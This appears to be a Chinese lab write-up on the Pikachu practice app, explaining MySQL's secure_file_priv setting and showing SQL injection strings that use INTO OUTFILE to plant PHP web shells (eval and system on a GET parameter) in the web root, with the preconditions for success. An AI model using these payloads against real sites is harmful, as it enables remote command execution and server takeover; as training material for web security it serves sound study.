Pikachu-Sql-Inject - 通过sql进行远程服务器控制(试验)

secure_file_priv是MySQL中的系统变量,用于限制文件的读取和写入。

查看命令:

复制代码
show variables like "secure%" 
//或者
select @@secure_file_priv;

1.secure_file_priv = NULL ,限制文件的读取和写入。

2.secure_file_priv = 文件路径 ,限制文件的读取和写入只能在设定的文件夹中。

3.secure_file_priv= "", 对文件和读取和写入没有任何限制。

into outfile ,将select 的结果写入到指定的文件中;

复制代码
vince' union select " <?php @eval($_GET['test'])?>",2 into outfile "/var/www/html/1.php"#
vince' union select " <?php system($_GET['cmd'])?>",2 into outfile "/var/www/html/2.php"#

//构造sql
vince' union select " <?php system($_GET['cmd'])?>",2 into outfile "/var/lib/mysql-files/2.php"#

执行sql语句

进入到服务器目录下,看到文件已生成;

这个实验有三个前提条件:

1、需要知道远程服务器的文件目录;

2、需要该目录有写权限;

3、需要数据库开启secure_file_priv权限;

相关推荐
zhangjin11205 小时前
AOSP下载
android
持敬chijing5 小时前
Linux基础命令与目录命令
linux·运维·服务器
小张成长计划..5 小时前
【Linux】12:进程状态
linux·运维·服务器
Mico185 小时前
MySQL 8.0.35 GTID 主从复制搭建-基于GITD
android·mysql·adb
农村小镇哥6 小时前
C#中的字符串格式化
服务器·开发语言·c#
YXL1111YXL7 小时前
LeakCanary 源码解析检测泄露工作机制(一)
android·leakcanary
OneNobody7 小时前
Spark SQL AQE工作原理源码剖析
大数据·sql·spark
kali-Myon9 小时前
深入 MySQL 内核:从临时哈希表分配机制详解 Floor 报错注入核心原理
数据库·sql·mysql·安全·web
且随疾风前行.9 小时前
Android Binder 驱动 - 内核驱动层源码初探
android·网络·binder
在水一缸9 小时前
当 AI 拥有了“核按钮”:深入解析 MCP 服务器与命令执行护栏
运维·服务器·人工智能·命令执行·智能体·ai安全·mcp